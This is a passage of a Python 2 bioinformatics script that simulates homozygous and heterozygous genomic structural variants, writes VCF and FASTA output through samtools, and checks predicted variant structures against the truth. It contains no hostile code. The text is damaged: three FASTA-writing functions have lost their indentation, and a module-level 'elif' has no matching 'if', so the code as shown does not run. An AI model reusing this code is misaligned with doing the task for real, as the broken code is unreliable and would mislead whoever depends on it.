                    tra1[SV_ID]['b'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4][2]])
                    tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['+ref_allele[a3[-2]][2]])
def sv_homo_initial():
    """Reset global sv_homo_info with an empty record list per SV type."""
    for sv_type in ('DEL','DUP','INV','TRA','DUP_TANDEM'):
        sv_homo_info[sv_type]=[]
def produce_keys(key):
    """Return [ref_structure, alt_structure] allele-pair strings for an
    SV type key.  DUP_TANDEM draws a random copy number in [2,20)."""
    if key=='DEL':
        ka,kb='a/a','/'
    elif key=='DUP_TANDEM':
        ka='a/a'
        copies=random.sample(range(2,20),1)[0]
        kb='a'*copies+'/'+'a'*copies
    elif key=='DUP':
        ka,kb='ab/ab','aba/aba'
    elif key=='INV':
        ka,kb='a/a','a^/a^'
    elif key=='TRA':
        ka,kb='ab/ab','ba/ba'
    return [ka,kb]
def sv_homo_produce():
    """Append structure strings (ref/alt allele pairs from produce_keys)
    to every picked region, filed under its SV type in global
    sv_homo_info.

    Fix: removed the unused local 'sv_len' (computed but never read).
    """
    for k1 in SV_region:
        k2=k1[-1]  # SV type is the last element of the region record
        sv_homo_info[k2].append(k1+produce_keys(k2))
def sv_het_produce():
    """Derive heterozygous records from global sv_homo_info into global
    sv_het_info by assigning the alt structure to one random allele
    (the other allele keeps the reference structure)."""
    for sv_type in sv_homo_info.keys():
        sv_het_info[sv_type]=[]
        for rec in sv_homo_info[sv_type]:
            which=random.choice(range(2))
            pool=[rec[-2].split('/')[0],rec[-1].split('/')[0]]
            rec[-1]='/'.join([pool[which],pool[1-which]])
            sv_het_info[sv_type].append(rec)
def sv_rec_homo_produce():
    """Write one '<prefix>.homo.<TYPE>.rec' file per SV type with one
    space-separated record per line (Python 2 print syntax)."""
    for k1 in sv_homo_info.keys():
        fo=open(dict_opts['--output-prefix']+'.homo.'+k1+'.rec','w')
        print dict_opts['--output-prefix']+'.homo.'+k1+'.rec'
        for k2 in sv_homo_info[k1]:
            print >>fo, ' '.join([str(i) for i in k2])
        fo.close()
def sv_rec_het_produce():
    """Write one '<prefix>.het.<TYPE>.rec' file per SV type with one
    space-separated record per line (Python 2 print syntax)."""
    for k1 in sv_het_info.keys():
        fo=open(dict_opts['--output-prefix']+'.het.'+k1+'.rec','w')
        print dict_opts['--output-prefix']+'.het.'+k1+'.rec'
        for k2 in sv_het_info[k1]:
            print >>fo, ' '.join([str(i) for i in k2])
        fo.close()
def sv_info_rewrite(sv_h_info):
    """Re-key SV records into global sv_info as
    {ref_structure: {alt_structure: [record, ...]}}, where each record is
    the stringified coordinates plus a 0.0 placeholder score."""
    for key in sv_h_info.keys():
        for rec in sv_h_info[key]:
            ref_k=rec[-2]
            alt_k=rec[-1]
            if not ref_k in sv_info:
                sv_info[ref_k]={}
            if not alt_k in sv_info[ref_k]:
                sv_info[ref_k][alt_k]=[]
            sv_info[ref_k][alt_k].append([str(i) for i in rec[:-3]]+[0.0])
def sv_stat_calcu(sv_hash,key):
    """Build [count, min, q1, q2, max] rows for each size record of one
    SV type.

    Each input row is [count, min_size, max_size, ...]; q1/q2 split the
    size range into thirds.

    Fix: uses floor division '//' so the arithmetic stays integral under
    both Python 2 and Python 3 (the original '/' yields floats on py3).
    """
    out=[]
    for k1 in sv_hash[key]:
        sv_min=int(k1[1])
        sv_max=int(k1[2])
        sv_int=(sv_max-sv_min)//3
        out.append([k1[0],sv_min,sv_min+sv_int,sv_max-sv_int,sv_max])
    return out
def sv_size_pick(sv_stat):
    """Draw random SV sizes from each stat row [count, min, q1, q2, max].

    Roughly one third of the sizes come from [min,q1); the remainder is
    split evenly between [q1,q2) and [q2,max).  Returns the sizes in
    random order.

    Fixes: (1) made integer division explicit with '//' -- the original
    '/' inside range() raises TypeError under Python 3; (2) the shuffled
    list was computed into 'permute' but the unshuffled 'out' was
    returned; the shuffle is now actually returned.
    """
    out=[]
    for k1 in sv_stat:
        n=int(k1[0])
        n_low=n//3
        n_mid=(n-n_low)//2
        n_high=n-n_low-n_mid
        out+=[random.choice(range(int(k1[1]),int(k1[2]))) for i in range(n_low)]
        out+=[random.choice(range(int(k1[2]),int(k1[3]))) for i in range(n_mid)]
        out+=[random.choice(range(int(k1[3]),int(k1[4]))) for i in range(n_high)]
    return random.sample(out,len(out))
def chromos_readin(refs):
    """Parse the reference's .fai index and apportion SVs per chromosome.

    Returns [genome_length, kept_chromosome_names, per-chromosome target
    SV counts, {chrom: length}].  Only chromosomes whose proportional
    share of the module-global sv_total_num rounds to more than 1 are
    kept.

    Fix: removed the unused local 'chrom_to_remove'.
    """
    fin=open(refs+'.fai')
    chromos=[]
    chromo_length=[]
    genome_length=0
    for line in fin:
        pin=line.strip().split()
        chromos.append(pin[0])
        genome_length+=int(pin[1])
        chromo_length.append(int(pin[1]))
    fin.close()
    chromo_num_region=[]
    for k1 in chromo_length:
        # SV quota proportional to chromosome length
        chromo_num_region.append(int(round(float(k1)/float(genome_length)*sv_total_num)))
    out_num_region=[]
    out_chromos=[]
    out_length={}
    for i in range(len(chromo_num_region)):
        if chromo_num_region[i]>1:
            out_chromos.append(chromos[i])
            out_num_region.append(chromo_num_region[i])
            out_length[chromos[i]]=chromo_length[i]
    return [genome_length]+[out_chromos]+[out_num_region]+[out_length]
def sv_hash_add(list_in,key):
    """Tag every size in list_in with SV type 'key' in global sv_hash
    (size -> list of requesting SV types)."""
    for size in list_in:
        if size in sv_hash:
            sv_hash[size]+=[key]
        else:
            sv_hash[size]=[key]
def sv_region_pick():
    #pick random regions across the genome
    """Scatter the drawn SV sizes onto random non-overlapping regions.

    For each chromosome, picks num_region+1 sorted random anchor points
    (1kb from the ends) and assigns the next shuffled size to each
    inter-anchor gap; gaps under 1kb are skipped.  TRA events also get a
    second coordinate end2.  Returns [[chrom,start,end(,end2),type],...].
    Reads module globals: chromos, chromo_num_region, chromo_length,
    sv_hash, and the *_size lists.
    """
    SV_region=[]
    rec=-1
    sv_size=del_size+dup_size+inv_size+tra_size+dup2_size
    sv_size=random.sample(sv_size,len(sv_size))
    for k1 in range(len(chromos)):
        chromosome=chromos[k1]
        num_region=chromo_num_region[k1]
        range_region=chromo_length[chromosome]
        temp_start_region=sorted(random.sample(range(1000, range_region-1000),num_region+1))
        temp_end_region=[]
        for k2 in range(num_region):
            start=temp_start_region[k2]
            start2=temp_start_region[k2+1]
            if start2-start<1000: continue
            rec+=1
            temp_sv_size=sv_size[rec]
            # consume one pending SV type registered for this size
            sv_type=sv_hash[sv_size[rec]][0]
            del sv_hash[sv_size[rec]][0]
            end=start+temp_sv_size
            if not end<start2-300:
                # size does not fit this gap: shrink into the first half
                end=random.choice(range(start,int(numpy.mean([start,start2]))))
            if sv_type=='TRA':
                # NOTE(review): range(end+100,start2-100) can be empty when
                # the gap is tight, making random.choice raise -- confirm
                # the spacing guarantees before relying on this
                end2=random.choice(range(end+100,start2-100))
            temp_end_region.append(end)
            if sv_type=='TRA':
                SV_region.append([chromos[k1],start,end,end2,sv_type])
            else:
                SV_region.append([chromos[k1],start,end,sv_type])
    return SV_region
def ref_base_returnN(ref,chromo,pos):
    # Fast stub standing in for ref_base_readin: always reports 'N' so no
    # per-breakpoint samtools lookup is needed (same signature kept).
    return 'N'
def ref_base_readin(ref,chromo,pos):
    """Fetch the single reference base at chromo:pos via `samtools faidx`;
    returns 'N' when the query yields no sequence line."""
    fref=os.popen(r'''samtools faidx %s %s:%s-%s'''%(ref,chromo,str(pos),str(pos)))
    tre=fref.readline().strip().split()
    REF_AL=fref.readline().strip().split()
    if not REF_AL==[]:
        return REF_AL[0]
    else:
        return 'N'
def del_flag_SA(k1,k2):
    """Return 1 when alt structure k2 is obtained from ref structure k1
    purely by deleting blocks: no inversion marker, no duplicated letter,
    strictly ascending letter order, and k2 != k1.  Otherwise 0."""
    if '^' in k2:
        return 0
    for ch in k2:
        if k2.count(ch)>1:
            return 0
    for idx in range(len(k2)-1):
        if ord(k2[idx+1])-ord(k2[idx])<1:
            return 0
    if k1==k2:
        return 0
    return 1
def order_SV_Homo_write(sv_info):
    # Index homozygous SV records into the global order_SV_Pos, keyed by
    # chromosome then integer start position. Each entry stores the record
    # with integer breakpoints plus the first-allele structure string.
    for ref_struct in sv_info.keys():
        for alt_struct in sv_info[ref_struct].keys():
            for rec in sv_info[ref_struct][alt_struct]:
                chrom=rec[0]
                pos=int(rec[1])
                if not chrom in order_SV_Pos.keys():
                    order_SV_Pos[chrom]={}
                if not pos in order_SV_Pos[chrom].keys():
                    order_SV_Pos[chrom][pos]=[]
                order_SV_Pos[chrom][pos].append([[chrom]+[int(i) for i in rec[1:-1]],[alt_struct.split('/')[0]]])
def order_SV_Het_write(sv_info):
    # Index heterozygous SV records into the global order_SV_Pos, keyed by
    # chromosome then integer start position. Each entry stores the record
    # with integer breakpoints plus both allele structures and the first
    # reference-allele structure.
    for ref_struct in sv_info.keys():
        for alt_struct in sv_info[ref_struct].keys():
            for rec in sv_info[ref_struct][alt_struct]:
                chrom=rec[0]
                pos=int(rec[1])
                if not chrom in order_SV_Pos.keys():
                    order_SV_Pos[chrom]={}
                if not pos in order_SV_Pos[chrom].keys():
                    order_SV_Pos[chrom][pos]=[]
                order_SV_Pos[chrom][pos].append([[chrom]+[int(i) for i in rec[1:-1]],[alt_struct.split('/')[0],alt_struct.split('/')[1],ref_struct.split('/')[0]]])
def Ref_Alt_Produce(ChromoList,bp_list,letter_new,Ref_Seq_File):
    #Chromo=Chr, target chromosome
    #BamN: DG187, DG196... name of sample
    #eg of bp_list:[184569179, 184569775, 184571064, 184572009, 184572016]
    #Eg of flank: flank : 446
    # Build the ALT haplotype described by letter string `letter_new`: each
    # letter 'a','b',... names one reference block between consecutive
    # breakpoints of bp_list, '^' marks a reverse-complemented block, and
    # '' means a pure insertion. Blocks are fetched with `samtools faidx`.
    if letter_new=='':
        return insert_read_decide(bp_list)
    else:
        bp_hash={}
        bp_seq=[]
        # split bp_list into per-chromosome groups [chrom,pos,pos,...]
        for k1 in bp_list:
            if k1 in ChromoList:
                bp_seq.append([k1])
            else:
                bp_seq[-1].append(k1)
        rec=0
        # map letter -> [chrom,left,right] for every breakpoint interval
        for k1 in bp_seq:
            for k2 in range(len(k1)-2):
                rec+=1
                bp_hash[chr(96+rec)]=[k1[0],k1[k2+1],k1[k2+2]]
        letter_seq={}
        for k1 in bp_hash.keys():
            Chromo=bp_hash[k1][0]
            region_left=bp_hash[k1][1]
            region_right=bp_hash[k1][2]
            seq=os.popen(r'''samtools faidx %s %s:%d-%d'''%(Ref_Seq_File,Chromo,region_left,region_right))
            seq.readline().strip().split()  # fasta header, discarded
            lines=[]
            while True:
                line=seq.readline().strip().split()
                if not line: break
                lines.append(line)
            Seq1=lines[0][0]
            for j in range(len(lines))[1:]:
                Seq1=''.join([Seq1,lines[j][0]])
            letter_seq[k1]=Seq1
            letter_seq[k1+'^']=reverse(complementary(Seq1))  # inverted copy
        new_Seq=''
        new_letter=[]
        # tokenize letter_new, attaching each '^' to its preceding letter
        for k1 in letter_new:
            if not k1=='^':
                new_letter.append(k1)
            else:
                new_letter[-1]+=k1
        for k1 in new_letter:
            new_Seq+=letter_seq[k1]
        new_Seq+=insert_read_decide(bp_list)  # optional trailing micro-insertion
        return new_Seq
def Ref_Ref_Produce(Chromo,bp_list,Ref_Seq_File):
    """Return the reference sequence Chromo:bp_list[0]-bp_list[-1] via `samtools faidx`."""
    left=int(bp_list[0])
    right=int(bp_list[-1])
    handle=os.popen(r'''samtools faidx %s %s:%d-%d'''%(Ref_Seq_File, Chromo, left,right))
    handle.readline().strip().split()  # fasta header line, discarded
    pieces=[]
    for raw_line in handle:
        pieces.append(raw_line.strip().split()[0])
    handle.close()
    return ''.join(pieces)
def reverse(seq):
    """Return the characters of seq in reverse order, joined into a string."""
    return ''.join(seq[::-1])
def complementary(seq):
    """Return the DNA complement of seq (A<->T, G<->C, case kept, N self-maps).

    Characters outside ATGCNatgcn are silently dropped, matching the original
    implementation.
    """
    pairs=dict(zip('ATGCNatgcn','TACGNtacgn'))
    return ''.join([pairs[base] for base in seq if base in pairs])
def unit_produce(letters):
    """Return every contiguous substring of the consecutive-letter runs in `letters`.

    The input letters are sorted and grouped into runs of alphabetically
    consecutive characters ('a','b','c' -> 'abc'); for each run all substrings
    are generated (shortest first, left to right) and the combined list is
    returned reversed, so longer units come first.

    Fixes vs original: parameter no longer shadows the builtin `list`, the
    input is sorted once instead of twice, and an empty input returns []
    instead of raising IndexError.
    """
    ordered=sorted(letters)
    if not ordered:
        return []
    runs=[ordered[0]]
    for ch in ordered[1:]:
        if ord(ch)-ord(runs[-1][-1])==1:
            runs[-1]+=ch          # extend the current consecutive run
        else:
            runs.append(ch)       # start a new run
    units=[]
    for run in runs:
        for width in range(1,len(run)+1):
            for offset in range(len(run)-width+1):
                units.append(run[offset:offset+width])
    return units[::-1]
def fasta_homo_write(fasta_out):
fo=open(fasta_out,'w')
print fasta_out
for k1 in chromos:
print >>fo, '>'+k1
new1_ref=''
rec1_start=0
for k2 in sorted(order_SV_Pos[k1].keys()):
print [k1,k2]
rec1_start+=1
k3=order_SV_Pos[k1][k2]
start=int(k3[0][0][1])
end=int(k3[0][0][-1])
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,start-1],ref)
new1_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][0],ref)
rec1_start=end
rec1_start+=1
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,chromo_length[k1]],ref)
new1_seq=[]
for k1 in range(len(new1_ref)/60):
new1_seq.append(new1_ref[k1*60:(k1+1)*60])
new1_seq.append(new1_ref[(k1+1)*60:])
for k1 in new1_seq:
if not k1=='':
print >>fo, k1
fo.close()
def fasta_homo_write_test(fasta_out):
fo=open(fasta_out,'w')
print fasta_out
for k1 in chromos[:1]:
print >>fo, '>'+k1
new1_ref=''
rec1_start=0
for k2 in sorted(order_SV_Pos[k1].keys()):
print [k1,k2]
rec1_start+=1
k3=order_SV_Pos[k1][k2]
start=int(k3[0][0][1])
end=int(k3[0][0][-1])
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,start-1],ref)
new1_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][0],ref)
rec1_start=end
rec1_start+=1
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,chromo_length[k1]],ref)
new1_seq=[]
for k1 in range(len(new1_ref)/60):
new1_seq.append(new1_ref[k1*60:(k1+1)*60])
new1_seq.append(new1_ref[(k1+1)*60:])
for k1 in new1_seq:
if not k1=='':
print >>fo, k1
fo.close()
def fasta_het_write(fasta_out):
fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'w')
fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'w')
print fasta_out.replace('.het.fa','.het1.fa')
print fasta_out.replace('.het.fa','.het2.fa')
for k1 in chromos:
print >>fo1, '>'+k1
print >>fo2, '>'+k1
new1_ref=''
rec1_start=0
new2_ref=''
rec2_start=0
for k2 in sorted(order_SV_Pos[k1].keys()):
rec1_start+=1
k3=order_SV_Pos[k1][k2]
start=int(k3[0][0][1])
end=int(k3[0][0][-1])
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,start-1],ref)
new1_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][0],ref)
rec1_start=end
rec2_start+=1
new2_ref+=Ref_Ref_Produce(k1,[rec2_start,start-1],ref)
new2_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][1],ref)
rec2_start=end
rec1_start+=1
rec2_start+=1
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,chromo_length[k1]],ref)
new1_seq=[]
for k1 in range(len(new1_ref)/60):
new1_seq.append(new1_ref[k1*60:(k1+1)*60])
new1_seq.append(new1_ref[(k1+1)*60:])
for k1 in new1_seq:
if not k1=='':
print >>fo1, k1
new2_ref+=Ref_Ref_Produce(k1,[rec2_start,chromo_length[k1]],ref)
new2_seq=[]
for k1 in range(len(new2_ref)/60):
new2_seq.append(new2_ref[k1*60:(k1+1)*60])
new2_seq.append(new2_ref[(k1+1)*60:])
for k1 in new2_seq:
if not k1=='':
print >>fo2, k1
fo1.close()
fo2.close()
def Sample_info_ReadIn(Sam_File):
    # Read SV statistics into the global sv_hash: each non-empty line is
    # "<SV_type> <int> <int> ..."; the integer fields are stored as one record
    # under sv_hash[type] and the first field (a count/size) is inflated by
    # 25% (int-truncated).
    # Fix: the original if/else branches ran identical append/scale code --
    # only the key initialization differed -- so the duplication is removed.
    fi=open(Sam_File)
    for line in fi:
        pin=line.strip().split()
        if not pin==[]:
            if not pin[0] in sv_hash.keys():
                sv_hash[pin[0]]=[]
            sv_hash[pin[0]].append([int(i) for i in pin[1:]])
            sv_hash[pin[0]][-1][0]=int(sv_hash[pin[0]][-1][0]*1.25)
    fi.close()
def write_axiom_pbs_header(fout,JobToDo):
    # Write a PBS/Torque batch-script header for job `JobToDo` to file `fout`.
    # Resources, target node, and notification address are hard-coded.
    fo=open(fout,'w')
    print >>fo, '#!/bin/bash'
    print >>fo, ' '
    print >>fo, '#PBS -N '+JobToDo
    print >>fo, '#PBS -l mem=4gb,walltime=100:0:0,nodes=compute-4-3'
    print >>fo, '#PBS -m a'
    print >>fo, '#PBS -M xuefzhao@umich.edu'
    print >>fo, '#PBS -o '+JobToDo+'.log'
    print >>fo, '#PBS -e '+JobToDo+'.err'
    print >>fo, '#PBS -V'
    print >>fo, '#PBS -d .'
    fo.close()
def sv_total_num_calcu():
    """Total simulated SV count: sum of the first field of every record in the
    five per-type stat tables (globals del_stat, dup_stat, dup2_stat,
    inv_stat, tra_stat)."""
    total=0
    for stat_table in [del_stat,dup_stat,dup2_stat,inv_stat,tra_stat]:
        for record in stat_table:
            total+=record[0]
    return total
def pick_random_seqs(ref,sv_total_num,chromo_length):
    #12% of all SVs have micro insrts at both /either ends
    #double number of seqs would be randomly picked from genome as long micro-insertions
    # Sample short (20-50bp) reference fragments from the autosomes with
    # `samtools faidx` to serve as the micro-insertion pool.
    # Returns {chromosome: [sequence, ...]}.
    num_micro_ins_over20bp=float(sv_total_num)*0.12*2
    genome_length=0
    chromos_num_regions={}
    chrom_seqs={}
    for x in chromo_length.keys():
        if not 'GL' in x and not x in ['X','Y','MT']:  # autosomes only
            genome_length+=chromo_length[x]
    for x in chromo_length.keys():
        if not 'GL' in x and not x in ['X','Y','MT']:
            # number of fragments proportional to chromosome length
            chromos_num_regions[x]=float(chromo_length[x])/float(genome_length)*num_micro_ins_over20bp
    for x in chromos_num_regions.keys():
        chrom_seqs[x]=[]
        int_num=int(round(chromos_num_regions[x]))
        # pick distinct start positions, 10kb clear of the chromosome ends
        seq_pick=random.sample(range(10000,chromo_length[x]-10000),int_num)
        for y in sorted(seq_pick):
            length_pick=random.sample(range(20,50),1)[0]
            seqs=os.popen(r'''samtools faidx %s %s:%d-%d'''%(ref,x,y,y+length_pick))
            seqs.readline()  # fasta header, discarded
            test=seqs.readline().strip()
            if not 'NNNNNNNN' in test:  # reject fragments from gap/N regions
                chrom_seqs[x].append(test)
            seqs.close()
    return chrom_seqs
def produce_random_seqs(length):
    """Return a uniformly random DNA string of the requested length."""
    return ''.join([random.choice(['A','T','G','C']) for _ in range(length)])
# ---- driver: simulate simple (homozygous) SVs, write VCF + ALT fasta ----
opts,args=getopt.getopt(sys.argv[2:],'',['reference=','input-sim=','input-rec=','output-prefix='])
dict_opts=dict(opts)
Sam_File=dict_opts['--input-sim']
sv_hash={}
Sample_info_ReadIn(Sam_File)
# per-type size statistics (sv_stat_calcu / sv_size_pick defined elsewhere in this file)
del_stat=sv_stat_calcu(sv_hash,'DEL')
dup_stat=sv_stat_calcu(sv_hash,'DUP_TANDEM')
dup2_stat=sv_stat_calcu(sv_hash,'DUP')
dup3_stat=[]
for i in dup2_stat:
    dup3_stat.append([i[0]]+[j+1000 for j in i[1:]])  # pad dispersed-DUP sizes by 1kb
dup2_stat=dup3_stat
inv_stat=sv_stat_calcu(sv_hash,'INV')
tra_stat=sv_stat_calcu(sv_hash,'TRA')
del_size=sv_size_pick(del_stat)
dup_size=sv_size_pick(dup_stat)
dup2_size=sv_size_pick(dup2_stat)
inv_size=sv_size_pick(inv_stat)
tra_size=sv_size_pick(tra_stat)
sv_total_num=sv_total_num_calcu()
refs=dict_opts['--reference']
ref=refs
# NOTE(review): these checks only print a warning; execution continues even
# when the reference or its .fai index is missing -- confirm this is intended.
if not os.path.isfile(refs):
    print 'Wrong reference genome !'
if not os.path.isfile(refs+'.fai'):
    print 'reference genome not indexed !'
chromos_TOTAL=chromos_readin(refs)
genome_length=chromos_TOTAL[0]
chromos=chromos_TOTAL[1]
chromo_num_region=chromos_TOTAL[2]
chromo_length=chromos_TOTAL[3]
sv_hash={}  # re-purposed from stats to a size -> [SV types] assignment queue
sv_hash_add(del_size,'DEL')
sv_hash_add(dup2_size,'DUP')
sv_hash_add(dup_size,'DUP_TANDEM')
sv_hash_add(inv_size,'INV')
sv_hash_add(tra_size,'TRA')
SV_region=sv_region_pick()
SV_region_filter=[]
for x in SV_region:
    if x[-1]=='DUP' and x[2]-x[1]<1100: continue  # dispersed DUPs need >=1100bp
    else:
        SV_region_filter.append(x)
SV_region=SV_region_filter
sv_homo_info={}
sv_homo_initial()
sv_homo_produce()
# insert an extra internal breakpoint into each dispersed DUP; DUPs shorter
# than 1101bp are dropped
temp_dup=[]
for y in range(len(sv_homo_info['DUP'])):
    x=sv_homo_info['DUP'][y]
    if x[2]-x[1]<2000 and x[2]-x[1]>1100:
        z=random.choice([x[1]+500,x[2]-500])
        temp_dup.append(x[:2]+[z]+x[2:])
        #sv_homo_info['DUP'][y]=x[:2]+[z]+x[2:]
    elif x[2]-x[1]>1999:
        z=random.choice(range(x[1]+800,x[1]+1200)+range(x[2]-1200,x[2]-800))
        temp_dup.append(x[:2]+[z]+x[2:])
        #sv_homo_info['DUP'][y]=x[:2]+[z]+x[2:]
    elif x[2]-x[1]<1101:
        continue
sv_homo_info['DUP']=temp_dup
#write homo sv rec
sv_rec_homo_produce()
sv_info={}
sv_info_rewrite(sv_homo_info)
dup1={}
inv1={}
del1={}
tra1={}
sv_rec_2(sv_info)
sv_out={}
hash_reorder()
vcf_out=dict_opts['--output-prefix']+'.vcf'
write_VCF_header(vcf_out)
write_VCF_main(vcf_out)
fasta_out=dict_opts['--output-prefix']+'.homo.fa'
seq_ins_pools=pick_random_seqs(ref,sv_total_num,chromo_length)
#produce fasta file containing all sv file for homo svs
order_SV_Pos={}
order_SV_Homo_write(sv_info)
fasta_homo_write(fasta_out)
os.system(r'''samtools faidx %s'''%(fasta_out))
elif function_name=='complex':
def bp_to_let(del_info_unit):
    """Convert a breakpoint row to its reference letter structure 'ab…/ab…'.

    Fields that name a chromosome (member of the global `chromos`, or any
    non-digit token) are counted; if none are found, return 0. Otherwise one
    letter is assigned per breakpoint interval (two positions are consumed
    per chromosome field) and the same letter string is used for both alleles.
    """
    num_chr_fields=0
    for field in del_info_unit[0]:
        if field in chromos or not field.isdigit():
            num_chr_fields+=1
    if num_chr_fields==0:
        return 0
    letter=''.join([chr(97+i) for i in range(len(del_info_unit[0])-2*num_chr_fields)])
    return '/'.join([letter,letter])
def chromo_readin(ref):
    """Return the chromosome names (first column) listed in ref's .fai index file."""
    names=[]
    fai=open(ref+'.fai')
    for raw_line in fai:
        names.append(raw_line.strip().split()[0])
    fai.close()
    return names
def sv_sample_readin(path):
    # Walk path/<sample>/<subdir>/ for '*.coverge' files. Each record in such
    # a file occupies 5 lines: line 1 is a breakpoint row (converted to a
    # reference letter structure via bp_to_let), line 2's first field is the
    # predicted structure; lines 3-5 are read and discarded.
    # Returns {reference structure: [unique predicted structures]}.
    # NOTE(review): the directory loop variables k1/k2 are re-bound inside the
    # innermost loop (k1=bp_to_let(...), k2=pin2[0]); they are not used again
    # as directory names afterwards, so this shadowing appears harmless.
    if not path[-1]=='/':
        path+='/'
    out={}
    for k1 in os.listdir(path):
        path1=path+k1+'/'
        if os.path.isdir(path1):
            for k2 in os.listdir(path1):
                path2=path1+k2+'/'
                for k3 in os.listdir(path2):
                    if k3.split('.')[-1]=='coverge':
                        fin=open(path2+k3)
                        while True:
                            pin1=fin.readline().strip().split()
                            if not pin1: break
                            pin2=fin.readline().strip().split()
                            if not pin2: break
                            pin3=fin.readline().strip().split()
                            pin4=fin.readline().strip().split()
                            pin5=fin.readline().strip().split()
                            k1=bp_to_let([pin1])
                            k2=pin2[0]
                            if not k1 in out.keys():
                                out[k1]=[]
                            if not k2 in out[k1]:
                                out[k1].append(k2)
                        fin.close()
    return out
def sv_decide_caller(k1,k2):
    """'Right' when the predicted structure k2 exactly matches the truth k1, else 'Error'."""
    return 'Right' if k2==k1 else 'Error'
def simple_del_caller(k1,k2):
    """'Right' when alt structure k2 can be explained by pure deletion(s) of k1.

    Requirements on k2: no inversion mark '^', no character occurring more
    than twice (once per allele), and each allele's letters in strictly
    increasing order. Anything else yields 'Error'.
    """
    if '^' in k2:
        return 'Error'
    for ch in k2:
        if k2.count(ch)>2:
            return 'Error'
    allele_a=k2.split('/')[0]
    allele_b=k2.split('/')[1]
    for allele in [allele_a,allele_b]:
        for pos in range(len(allele)-1):
            if ord(allele[pos+1])-ord(allele[pos])<1:
                return 'Error'
    return 'Right'
def simple_del_let_pick(k1,k2):
    """Per allele, collect the letters of k1 missing from k2 and merge them
    into consecutive runs via letter_seg_2; returns [[runs_a],[runs_b]]."""
    ref_tokens=letter_seg_1(k1)
    alt_tokens=letter_seg_1(k2)
    missing=[[],[]]
    for allele in (0,1):
        for token in ref_tokens[allele]:
            if not token in alt_tokens[allele]:
                missing[allele].append(token)
    merged=[[],[]]
    if not missing[0]==[]:
        merged[0]=[missing[0][0]]
    if not missing[1]==[]:
        merged[1]=[missing[1][0]]
    letter_seg_2(missing,merged,0)
    letter_seg_2(missing,merged,1)
    return merged
def letter_seg_1(k2):
    """Split an 'xyz/xyz' genotype string into per-allele token lists,
    attaching each '^' (inversion mark) to the preceding letter."""
    tokens=[[],[]]
    for allele_index in (0,1):
        for ch in k2.split('/')[allele_index]:
            if ch=='^':
                tokens[allele_index][-1]+=ch
            else:
                tokens[allele_index].append(ch)
    return tokens
def letter_seg_2(lets,let2,index):
    """Merge adjacent tokens of lets[index] into let2[index] in place.

    Two plain tokens merge when alphabetically consecutive; two inverted
    ('^') tokens merge when reverse-consecutive. let2[index] must already
    hold the first token. Returns None (mutates let2).
    """
    for pos in range(1,len(lets[index])):
        prev_token=lets[index][pos-1]
        cur_token=lets[index][pos]
        if not '^' in prev_token and not '^' in cur_token:
            if ord(cur_token)-ord(prev_token)==1:
                let2[index][-1]+=cur_token
            else:
                let2[index].append(cur_token)
        elif '^' in prev_token and '^' in cur_token:
            if ord(cur_token[0])-ord(prev_token[-2])==-1:
                let2[index][-1]+=cur_token
            else:
                let2[index].append(cur_token)
        else:
            let2[index].append(cur_token)
def letter_seg_into_blocks(k2):
    """Segment genotype string k2 into merged per-allele blocks.

    Tokens are produced by letter_seg_1, merged by letter_seg_2, then every
    multi-letter inverted block is re-oriented from 'c^b^a^' form into
    'abc^' form (letters forward, single trailing '^').
    """
    tokens=letter_seg_1(k2)
    blocks=[[],[]]
    for allele in (0,1):
        if not tokens[allele]==[]:
            blocks[allele]=[tokens[allele][0]]
    letter_seg_2(tokens,blocks,0)
    letter_seg_2(tokens,blocks,1)
    for allele in (0,1):
        for pos in range(len(blocks[allele])):
            if '^' in blocks[allele][pos] and len(blocks[allele][pos])>2:
                blocks[allele][pos]=blocks[allele][pos][::-1].replace('^','')+'^'
    return blocks
def simple_inv_caller(k1,k2):
    """'Right' when stripping the inversion marks from k2's merged blocks
    recovers the reference structure k1; otherwise 'Error'. A k2 without any
    '^' cannot be a simple inversion and is 'Error' immediately."""
    if not '^' in k2:
        return 'Error'
    blocks=letter_seg_into_blocks(k2)
    stripped='/'.join([''.join([b.replace('^','') for b in blocks[0]]),
                       ''.join([b.replace('^','') for b in blocks[1]])])
    return 'Right' if stripped==k1 else 'Error'
def simple_dup_caller(k1,k2):
    """'Right' when collapsing immediately repeated tokens in k2 recovers k1
    (i.e. k2 is explainable as tandem duplication); otherwise 'Error'.
    Any inversion mark '^' disqualifies k2 immediately."""
    if '^' in k2:
        return 'Error'
    alleles=letter_seg_1(k2)
    collapsed=[]
    for allele in alleles:
        if allele==[]:
            collapsed.append(allele)
        else:
            collapsed.append([allele[0]])
            for token in allele[1:]:
                if not token==collapsed[-1][-1]:
                    collapsed[-1].append(token)
    deduped='/'.join([''.join(collapsed[0]),''.join(collapsed[1])])
    return 'Right' if deduped==k1 else 'Error'
def simple_tra_caller(k1,k2):
    """'Right' when k2 has no inversion mark and every character of k2 occurs
    exactly twice; otherwise 'Error'. (The '/' separator is counted too, so a
    standard single-'/' genotype string only passes if it has no separator or
    two of them -- behavior kept from the original.)"""
    if '^' in k2:
        return 'Error'
    for ch in k2:
        if not k2.count(ch)==2:
            return 'Error'
    return 'Right'
def simple_SV_filter(sv_hash):
    """Keep only the (truth, prediction) pairs that none of the simple-SV
    callers (exact match, deletion, inversion, duplication) can explain.
    The translocation caller is intentionally disabled, as in the original.
    Returns {truth: [unexplained predictions]}."""
    unresolved={}
    for truth in sv_hash.keys():
        for alt in sv_hash[truth]:
            if sv_decide_caller(truth,alt)=='Error' \
               and simple_del_caller(truth,alt)=='Error' \
               and simple_inv_caller(truth,alt)=='Error' \
               and simple_dup_caller(truth,alt)=='Error':
                if not truth in unresolved.keys():
                    unresolved[truth]=[]
